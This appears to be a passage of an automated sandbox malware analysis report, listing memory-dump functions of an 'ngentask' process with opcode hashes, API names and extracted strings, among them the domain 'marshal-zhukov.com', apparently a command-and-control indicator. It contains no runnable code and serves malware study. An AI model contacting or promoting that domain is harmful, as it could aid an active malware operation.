                                                                                                                      • Instruction ID: fb468e960744d0964d6a54c24ab65e53c3f2cedaab5be564a2d607b693a7bda3
                                                                                                                      • Opcode Fuzzy Hash: f50d186f23bcb17534f085227635f0c3494dc82024b1910238da7a2875b6f59f
                                                                                                                      • Instruction Fuzzy Hash: 47914A34604741CBD3258F24D880763FBB2AF96314FA8867ED4960B3C2D77AE81AC795
                                                                                                                      APIs
                                                                                                                      • CoCreateInstance.OLE32(00446A60,00000000,00000001,00446A50), ref: 00425B19
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateInstance
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 542301482-0
                                                                                                                      • Opcode ID: d02935a03b72f4b9daf67ba47a6ae6e90e25aa44049c2513cd37ccf0cbe15a71
                                                                                                                      • Instruction ID: 4be127970e74d3ba8cbdf26ebc5aee934b8144dff0c651ee01612779b641df8d
                                                                                                                      • Opcode Fuzzy Hash: d02935a03b72f4b9daf67ba47a6ae6e90e25aa44049c2513cd37ccf0cbe15a71
                                                                                                                      • Instruction Fuzzy Hash: E051BBB07047249BDB209B24EC96B7733A4EF82368F548559F985CB391F378E801C76A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: "
                                                                                                                      • API String ID: 0-123907689
                                                                                                                      • Opcode ID: 4fcae840f10020b6eb056c7bbf700c9250a17545a0d18b781a1dd7076018ac5b
                                                                                                                      • Instruction ID: dd14d937a97cefaf8bffdfa9403b6e9a7d8b00ff17e57d5e12b70809dd5c9411
                                                                                                                      • Opcode Fuzzy Hash: 4fcae840f10020b6eb056c7bbf700c9250a17545a0d18b781a1dd7076018ac5b
                                                                                                                      • Instruction Fuzzy Hash: 54C14871F083209FD724CE25E48076BB7E5AB94310FA9852FE4958B382E778DC45C78A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: --%(
                                                                                                                      • API String ID: 0-2664367441
                                                                                                                      • Opcode ID: 988560fdc17f744206da9937a4aec0366f3267a55da167e509994a1b18515a03
                                                                                                                      • Instruction ID: d88aec2eb7fe39cc1b7b47485eaa87fa011e6ba56b41b500a549fcdf20a5733a
                                                                                                                      • Opcode Fuzzy Hash: 988560fdc17f744206da9937a4aec0366f3267a55da167e509994a1b18515a03
                                                                                                                      • Instruction Fuzzy Hash: 8CD145B190C3A08FC714DF65D49166FFBE1AF92308F44896EE4D947282D778D909CB8A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-3019521637
                                                                                                                      • Opcode ID: a62f12c785040157e8b7fec30024f87e97063765c70b64fc9a21fdd16a94ed29
                                                                                                                      • Instruction ID: 6370a15c0eadb2c0176990f0375590d17bd257baa0dd12198a9f28dd6846b8a9
                                                                                                                      • Opcode Fuzzy Hash: a62f12c785040157e8b7fec30024f87e97063765c70b64fc9a21fdd16a94ed29
                                                                                                                      • Instruction Fuzzy Hash: DE6139B5B043105BD720AF25F88173777D5EB95718F98843EE98187382E278DC05D35A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: "
                                                                                                                      • API String ID: 0-123907689
                                                                                                                      • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                      • Instruction ID: c601073c496ea05fc122c30db4d8fae994325c58c904d4ae809ad3c14beac2ae
                                                                                                                      • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                      • Instruction Fuzzy Hash: 5F711B31B083358BD714CE2ED44072FB7D2ABC5710F99896FE49497391D278DC45878A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @A
                                                                                                                      • API String ID: 0-2960862460
                                                                                                                      • Opcode ID: 853bf25300ffd70dd1672832c4ab5f789289b0aa41f718e29d3b2827d7af40b0
                                                                                                                      • Instruction ID: 4719d8b980e654881bd5ae54f2d4b62ca754f3e150f2326b80e933f85abe6e03
                                                                                                                      • Opcode Fuzzy Hash: 853bf25300ffd70dd1672832c4ab5f789289b0aa41f718e29d3b2827d7af40b0
                                                                                                                      • Instruction Fuzzy Hash: 6A51EF726043118BD314CF29E8527AAB3F1FF81314F19492DEA958B3A1E778D941CB8A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: uxVd
                                                                                                                      • API String ID: 0-2172250569
                                                                                                                      • Opcode ID: 1b8588ce542fe38f60b518b41e37844cfaec0c15d9904e6db533feca748b9241
                                                                                                                      • Instruction ID: cfe32196f296b3655a051a700cb7ccaf60a1c3d8bf43f6ddb438b1d264a746a2
                                                                                                                      • Opcode Fuzzy Hash: 1b8588ce542fe38f60b518b41e37844cfaec0c15d9904e6db533feca748b9241
                                                                                                                      • Instruction Fuzzy Hash: BF414635605210EBDB259F16DC40B6BB7B6EB8C300F14982EF99547391C3BADC11CB5A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID: @
                                                                                                                      • API String ID: 2994545307-2766056989
                                                                                                                      • Opcode ID: b5dc717f0fbba509c6785d93897d05ffe255b17a6a7ee23cbca4033ae7c97cc9
                                                                                                                      • Instruction ID: 8a1cbf2da3cce85e16e5ddc7bff621da34532a0a9f7602195c82e4c827d3f028
                                                                                                                      • Opcode Fuzzy Hash: b5dc717f0fbba509c6785d93897d05ffe255b17a6a7ee23cbca4033ae7c97cc9
                                                                                                                      • Instruction Fuzzy Hash: 1E3124711483048BE314DF58C88176BBBF4EBC9328F28892DEA9587351D37999188B6A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-3019521637
                                                                                                                      • Opcode ID: 75d1dea9b8ae6d3d52cd8fab9c8ed0d56aa657e303dc28c0bb7e37ecd5b2999d
                                                                                                                      • Instruction ID: 003cd98cb6478ae5473ed13b07942baf67a07c151dbbb83d673c0b07066971a1
                                                                                                                      • Opcode Fuzzy Hash: 75d1dea9b8ae6d3d52cd8fab9c8ed0d56aa657e303dc28c0bb7e37ecd5b2999d
                                                                                                                      • Instruction Fuzzy Hash: 0D21F875B08210DBE7188B14B59163B73A2BF5A704FB8153EE44227712C729DC26CA9E
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 0-3019521637
                                                                                                                      • Opcode ID: fce78583beccccb18dcbe4383cf36ed0bca4275cc3974188bb6dc5112421aeef
                                                                                                                      • Instruction ID: 1bc23dd65da3dd8c740786462998b77e799f5a1b88ee2868af09e1f3cb0ee478
                                                                                                                      • Opcode Fuzzy Hash: fce78583beccccb18dcbe4383cf36ed0bca4275cc3974188bb6dc5112421aeef
                                                                                                                      • Instruction Fuzzy Hash: 1901DF797086608BD7289F08A45063BB3A6FBCA704FA4563ED58127612C339EC11CBDE
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-3019521637
                                                                                                                      • Opcode ID: be7a76aebc2ca3cfc71e5c82a45ba6aa8e370cf5ff2fb2360d4394e444ec2ccd
                                                                                                                      • Instruction ID: 0a034f5f1663caace4a6bb9a836a32d191f2d6f5481833966dd2236e8cf04307
                                                                                                                      • Opcode Fuzzy Hash: be7a76aebc2ca3cfc71e5c82a45ba6aa8e370cf5ff2fb2360d4394e444ec2ccd
                                                                                                                      • Instruction Fuzzy Hash: 2D1159B0E447108FD3249B1888805B7B7A2E796315FA4642DF1C3D7265D228D993C70A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 0-3019521637
                                                                                                                      • Opcode ID: 4ef03bff933ae179d6d4d0a0667eebb199f2544cf3e0b41afaa997531e0d8d6b
                                                                                                                      • Instruction ID: be3b5f2746f02530deb5feb29746b47a25c0387c6939b62836406c7d2f1bb1bc
                                                                                                                      • Opcode Fuzzy Hash: 4ef03bff933ae179d6d4d0a0667eebb199f2544cf3e0b41afaa997531e0d8d6b
                                                                                                                      • Instruction Fuzzy Hash: B2017C79708620DBD7189B10E45053FB7A2FBDA314FA59A2DE88123612C338EC02C7D9
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 0-3019521637
                                                                                                                      • Opcode ID: d897d307f14a83324b55d38241cd95c5d1d7233cd29fcd26d955bab2ca7c9954
                                                                                                                      • Instruction ID: c5db213e68517389fa1bacc7fe02f2657e0d406accfa76c5e8c5ae6cafa21dbc
                                                                                                                      • Opcode Fuzzy Hash: d897d307f14a83324b55d38241cd95c5d1d7233cd29fcd26d955bab2ca7c9954
                                                                                                                      • Instruction Fuzzy Hash: 7401D676608710DBD7059F04A4D153FB3A2FB85304F64292DE99113312C375EC21CBCA
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: SM
                                                                                                                      • API String ID: 0-1979282939
                                                                                                                      • Opcode ID: 453dd9c33fd62f94cf89f3633494ef655db85fd5194a2ccd465a6e066069d6d9
                                                                                                                      • Instruction ID: 686e4e71a5838c5623eca8c372c09e40d61c3fe1fb4bf8d66c1442654bdc4e02
                                                                                                                      • Opcode Fuzzy Hash: 453dd9c33fd62f94cf89f3633494ef655db85fd5194a2ccd465a6e066069d6d9
                                                                                                                      • Instruction Fuzzy Hash: 5E014933E59361A7E7084B764C4602BB5B7ABD5308F1BD03ED99C97E94D83CC8418781
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-3019521637
                                                                                                                      • Opcode ID: 0573dd715991369cdd1f280fb759e34388a203f8046d75158a62b467908f8789
                                                                                                                      • Instruction ID: 6775068db407afbd029485dd67f48e92e12a705e0908efcb34529f614b8733f4
                                                                                                                      • Opcode Fuzzy Hash: 0573dd715991369cdd1f280fb759e34388a203f8046d75158a62b467908f8789
                                                                                                                      • Instruction Fuzzy Hash: 5A019CB4A406415BEB359B14CC51BBB73E1DB85315F64443DF6C393295C678A841CB0A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: marshal-zhukov.com
                                                                                                                      • API String ID: 0-4220902806
                                                                                                                      • Opcode ID: 35afdaf516eea33ce03e6513eaf148aaf0eae721f362cd89d6e775b2e3548cf2
                                                                                                                      • Instruction ID: 99b9a3520732db4a189a64fdaa69584b650ab3ad65be4d7a7ec9059ec022e64d
                                                                                                                      • Opcode Fuzzy Hash: 35afdaf516eea33ce03e6513eaf148aaf0eae721f362cd89d6e775b2e3548cf2
                                                                                                                      • Instruction Fuzzy Hash: 20E0867854520086C314DF15C9627B373B1FF67345F04286AE583A7790E378D900C70E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: e92d9e2089b5f81b34984f0e7f9c4b9ef9ccf47d19e4db63930f3c2caffc988a
                                                                                                                      • Instruction ID: 3aa304a7d0fa500fc6045f644cc37729666229ce156517ad1b57301595ece370
                                                                                                                      • Opcode Fuzzy Hash: e92d9e2089b5f81b34984f0e7f9c4b9ef9ccf47d19e4db63930f3c2caffc988a
                                                                                                                      • Instruction Fuzzy Hash: DD42A172608712CBC724DF19C8C066AB3E1FFD5315F198A3ED985A73C5D738A8518B8A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 2845f90b0f95c747a555fa5bf8a918051d1958b0d98236403ea50b6d7d56deda
                                                                                                                      • Instruction ID: 1777e68b7d91d386861c3b6715b6e2e1425b0655a589d629913e829c29501dd8
                                                                                                                      • Opcode Fuzzy Hash: 2845f90b0f95c747a555fa5bf8a918051d1958b0d98236403ea50b6d7d56deda
                                                                                                                      • Instruction Fuzzy Hash: E3F1E5351047418FE729CF29C4A0762BBE2AFAA314F19D69DC4D64F793C739A806CB64
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 4efca549c26abc44cea81274d44c2d83f50ace1a55e197e4540ed3a8f98eb8eb
                                                                                                                      • Instruction ID: 79ef2ac2ab079c9716288af27d722cb335b435f82c8a601f77b53c19c6a9811e
                                                                                                                      • Opcode Fuzzy Hash: 4efca549c26abc44cea81274d44c2d83f50ace1a55e197e4540ed3a8f98eb8eb
                                                                                                                      • Instruction Fuzzy Hash: 6FF1C3702047818FE729CF25C4A0762BBE2EF5A304F18D59ED4D68F796C639E806CB65
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 1a1bde69dad0bb83ce981db007d88c7df5383efd9b8352ab850b70e9fafa4c5f
                                                                                                                      • Instruction ID: 4c7b76722d64659d1048aeec527b08ff0f6b3b14b1c8534bef11c1cb48b09bf1
                                                                                                                      • Opcode Fuzzy Hash: 1a1bde69dad0bb83ce981db007d88c7df5383efd9b8352ab850b70e9fafa4c5f
                                                                                                                      • Instruction Fuzzy Hash: A9F1CE356087418FC724CF29C88166BFBE2AFD9304F08892DE4D987791E679E815CB56
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 2e0cf6ceb5c9cf3f6408161c8e4c2c883fb952aeb6c5033a0ef318948abf4994
                                                                                                                      • Instruction ID: 4ab0ddeb53594f42122f396bed1e7cc8276a244e5ca2720b1984a3d426efef0d
                                                                                                                      • Opcode Fuzzy Hash: 2e0cf6ceb5c9cf3f6408161c8e4c2c883fb952aeb6c5033a0ef318948abf4994
                                                                                                                      • Instruction Fuzzy Hash: DAD1363A60C341CFD718CF39D89012AB7E2BB8A315F59467DD8A2873A2D735E945CB44
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: c701a98d002c9dbb6c9a59e0476d63c917ac8eae1dadfe1b5f7b4c759653338d
                                                                                                                      • Instruction ID: a61c44c01c9a0434f13fc9c78c48c3f9d4e48d367aadd388ca72e3039ceefae1
                                                                                                                      • Opcode Fuzzy Hash: c701a98d002c9dbb6c9a59e0476d63c917ac8eae1dadfe1b5f7b4c759653338d
                                                                                                                      • Instruction Fuzzy Hash: C6A18E36A043109BE724DF28CC817ABB7D1EB89304F54893EF995D73A1EA34AC41C75A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: b0ff7d083fc6f99a0781a80b03fcaa9ba85323ce8c2922655b4ffd266a37a9a9
                                                                                                                      • Instruction ID: 589add2fa41e31c9997d06b46da1bb0001926bf99ec90e931a762477534cca45
                                                                                                                      • Opcode Fuzzy Hash: b0ff7d083fc6f99a0781a80b03fcaa9ba85323ce8c2922655b4ffd266a37a9a9
                                                                                                                      • Instruction Fuzzy Hash: A5813672B083514BE724CE28DC80B2BB7E2EBC9314F19892DE995973A1E734EC01C795
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 015b18410103d42386a69cc8c64fbfd32ebe4fb51cfb67af8722f38daa065ad2
                                                                                                                      • Instruction ID: 1b48f47e0eab76b7d8bc870642a400784874d071703526f9b2e8ccaa7b962a57
                                                                                                                      • Opcode Fuzzy Hash: 015b18410103d42386a69cc8c64fbfd32ebe4fb51cfb67af8722f38daa065ad2
                                                                                                                      • Instruction Fuzzy Hash: 80A1177060D3928FC315CF2AC4D062AFBE2AFD9314F1986AEE4E54B392C635D805CB56
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: c109c4271a62ad69e9fa0db3bdc99f00f5ac8d887c75a014c68c9c01d7bcbd10
                                                                                                                      • Instruction ID: 021ac32237e3de101d5eaed90d65682ef050e0b34237964dbfa914d8232d51c5
                                                                                                                      • Opcode Fuzzy Hash: c109c4271a62ad69e9fa0db3bdc99f00f5ac8d887c75a014c68c9c01d7bcbd10
                                                                                                                      • Instruction Fuzzy Hash: 7A8146B9608301CFC714CF25D8526ABB7E1EF95354F04892DF89A87392E738E885CB56
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: a83c1ef261f37a1dc15fb6e6cd1ca9af2119ab112a38c06ca8dbf84291098b1c
                                                                                                                      • Instruction ID: 13c2b204bf09f3f92fe5bc76204d053a7afa86719872a2d14acb09db6cc85df8
                                                                                                                      • Opcode Fuzzy Hash: a83c1ef261f37a1dc15fb6e6cd1ca9af2119ab112a38c06ca8dbf84291098b1c
                                                                                                                      • Instruction Fuzzy Hash: 04614531A083119BE7249F58C84076BB7E2EFD8750F29C53DE98547361EA79DC50C789
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 0f19c1671aec1f889b41fd3618f042ef459f59e6baa6d344aa8703376dfc3fde
                                                                                                                      • Instruction ID: a04cf31874ae338892e57a4df6820a8180589f41023e9d8b723c52286c29b4d3
                                                                                                                      • Opcode Fuzzy Hash: 0f19c1671aec1f889b41fd3618f042ef459f59e6baa6d344aa8703376dfc3fde
                                                                                                                      • Instruction Fuzzy Hash: 4051B57160C3828FD7118F69C59076BFFE1AF92344F1849AEE4D19B382C379850ACB66
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 7bafa08bad9d9116c1c63dd45c09b455ebe49ae71fa4bcc4cefa4c31ac6c4f4e
                                                                                                                      • Instruction ID: df868054e21979bf635f59e1e6354e638118bae598b796eed872d70c115fc362
                                                                                                                      • Opcode Fuzzy Hash: 7bafa08bad9d9116c1c63dd45c09b455ebe49ae71fa4bcc4cefa4c31ac6c4f4e
                                                                                                                      • Instruction Fuzzy Hash: 5D5105346493025BC724DF26C880B2BB7E2ABCD314F28A92EF4D5973D5C278DC06874A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 347e5f27b1a7e8abec28799ae86e1cdc461b99de390a6d701bbfa8810c8ef1f2
                                                                                                                      • Instruction ID: 457cece9f224bafde436ee95a900d670ea02eebb2a5a69afb31b57df2a3af6bc
                                                                                                                      • Opcode Fuzzy Hash: 347e5f27b1a7e8abec28799ae86e1cdc461b99de390a6d701bbfa8810c8ef1f2
                                                                                                                      • Instruction Fuzzy Hash: 82512B35108240FBD72C9B14D6A16BF7352FB95308F64843EE44653292C7BADCA7CB5A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: b29dea5a8f183d8acf94dfcedb2c9a8392c00d7f53bab5646fb8eae0639cdb75
                                                                                                                      • Instruction ID: 4ad7e9ecd07623892f8382a6ce56f0e25be950db3abcc79367a2b1ca5eabb2fb
                                                                                                                      • Opcode Fuzzy Hash: b29dea5a8f183d8acf94dfcedb2c9a8392c00d7f53bab5646fb8eae0639cdb75
                                                                                                                      • Instruction Fuzzy Hash: 7F51D070A046019FD714DF14C480927B7A1FF85328F15867EE899AB392DA38EC42CF9A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: e61ffab149f65f2a36282800bf19c731ff7051e50c0c7c81f964f59a71d42744
                                                                                                                      • Instruction ID: baf6374348c6a5d04551104ff014b430a12857dff9407b71573024f7f8b341f0
